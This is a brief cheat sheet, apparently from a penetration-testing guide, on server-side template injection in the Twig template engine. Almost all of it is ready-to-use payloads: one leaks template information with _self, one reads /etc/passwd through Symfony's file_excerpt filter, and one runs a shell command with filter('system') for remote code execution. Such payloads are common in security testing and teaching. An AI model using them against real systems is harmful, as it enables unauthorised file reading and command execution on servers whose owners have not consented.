Information Disclosure
In Twig, we can use the _self keyword to obtain a little information about the current template:
{{ _self }}LFI
PHP web framework Symfony defines additional Twig filters. One of these filters is file_excerpt and can be used to read local files:
{{ "/etc/passwd"|file_excerpt(1,-1) }}RCE
To achieve remote code execution, we can use a PHP built-in function such as system.
{{ ['id'] | filter('system') }}